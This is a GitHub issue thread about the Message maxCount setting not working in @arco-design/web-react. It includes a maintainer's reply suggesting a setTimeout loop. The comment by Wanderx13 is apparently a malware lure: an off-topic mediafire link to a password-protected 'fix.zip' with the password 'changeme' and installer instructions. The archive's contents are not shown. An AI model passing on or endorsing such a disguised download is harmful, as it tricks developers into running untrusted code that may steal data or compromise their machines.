### ISSUE TITLE
Message maxCount 设置不生效

### ISSUE THREAD

**Issue by xueerli** [arco-design/arco-design#2792]
- [ ] I'm sure this does not appear in [the issue list of the repository](https://github.com/arco-design/arco-design/issues)

## Basic Info 
- **Package Name And Version:** @arco-design/web-react@2.63.3
- **Browser:** chrome127.0.0.0
- **Reproduction Link:** https://codesandbox.io/p/sandbox/spring-night-9l87rf

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by PengJiyuan** [comment]
不建议一下弹出10条消息，不是好的交互体验，我不知道这种场景是怎么来的。
如果非要这么写，可以用 setTimeout 搞一下。

```js
for (let i = 0; i < 10; i++) {
  setTimeout(() => {
    Message.info(`This is an info message! ${i}`);
  }, 10 * i);
}
```
